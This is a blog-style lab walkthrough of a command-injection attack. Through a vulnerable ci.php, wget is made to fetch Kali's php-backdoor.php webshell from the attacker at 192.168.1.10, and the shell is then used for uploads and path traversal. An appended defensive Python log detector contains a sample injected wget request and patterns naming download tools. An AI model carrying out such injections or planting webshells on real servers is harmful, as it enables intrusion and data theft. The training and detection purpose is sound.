
Thursday, April 12, 2018

Command Injection (III): Webshell -> php-backdoor.php


- Layout for this exercise:




- This exercise is based on the previous one:

http://www.whitelist1.com/2018/04/command-injection-attack.html


- In this exercise let's assume the simplest scenario, where the web server folder at the Ubuntu victim machine is readable, while in other exercises we study more complex scenarios:




- Starting XAMPP at Ubuntu:




- Also, let's check that ci.php is present at the victim side:






- ci.php is accessible from the attacker Kali Linux via web:




- Now, going to /usr/share/webshells, Kali has got a bunch of prepared webshells to be used as attacking tools for different languages:




- Going to the php folder we find php-backdoor.php:




- Setting a simple HTTP server at the attacker's side:




- Checking that the wget command is available at the victim side:




- Now, the wget command is injected by crafting the URL at Kali's browser (notice that 192.168.1.10 is Kali's IP):





- The transaction is successful, because php-backdoor.php is now present at the victim side:




- The simple HTTP server at Kali records the successful transaction:





- Finally, executing php-backdoor.php remotely via the browser is easy.

- Let's notice that there are several attacking options available, for instance uploading files, traversing paths, and also executing SQL injections:




- For instance, traversing to folders where compromising files are present:





- Also, other malicious files could be uploaded, even setting the destination folder:










- The attack is successful because the malicious file has been uploaded to the victim by injecting commands from the attacker's browser:
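As an added example (not part of the original post), here is a small Python detector, written from the victim side, that runs over constructed Apache access-log lines and flags the two traces this walkthrough leaves on the web server: a request to ci.php whose parameter chains a download tool behind a shell metacharacter, and a later request for the script that command fetched. The parameter name `host`, the log lines and their timestamps are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed Apache access-log lines (combined format, truncated after the size
# field). Hosts, paths and timestamps are made up for this example; the "host"
# parameter name of ci.php is an assumption.
SAMPLE_LOG = """\
192.168.1.10 - - [12/Apr/2018:10:00:01 +0200] "GET /ci.php?host=127.0.0.1 HTTP/1.1" 200 512
192.168.1.10 - - [12/Apr/2018:10:00:07 +0200] "GET /ci.php?host=127.0.0.1%3Bwget+http%3A%2F%2F192.168.1.10%3A8000%2Fphp-backdoor.php HTTP/1.1" 200 640
192.168.1.10 - - [12/Apr/2018:10:00:15 +0200] "GET /php-backdoor.php HTTP/1.1" 200 2048
192.168.1.10 - - [12/Apr/2018:10:01:00 +0200] "GET /index.php?page=about HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+')

# A metacharacter that lets a second command be chained onto the parameter
# value, combined with a tool able to pull a file from a remote host.
CHAIN_RE = re.compile(r'[;|&`$(]')
FETCH_RE = re.compile(r'\b(wget|curl|fetch|nc|ncat|python|perl|bash|sh)\b')


def find_injection_events(log_text):
    """Return (ip, timestamp, path, reason) tuples for each suspicious request."""
    events = []
    dropped = set()  # script names seen inside an injected download command
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m['target'])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote_plus(value)  # second decode also catches double-encoding
            if CHAIN_RE.search(value) and FETCH_RE.search(value):
                events.append((m['ip'], m['ts'], parts.path,
                               f'command chaining with download tool in parameter {name!r}: {value}'))
                # Remember the PHP file names the injected command pulled in so that
                # a later request for them on this server is flagged as well.
                for fn in re.findall(r'/([\w.-]+\.php)\b', value):
                    dropped.add('/' + fn)
        if parts.path in dropped and m['status'] == '200':
            events.append((m['ip'], m['ts'], parts.path,
                           'request for a script that was fetched by an injected command'))
    return events


if __name__ == '__main__':
    for event in find_injection_events(SAMPLE_LOG):
        print(*event, sep=' | ')
```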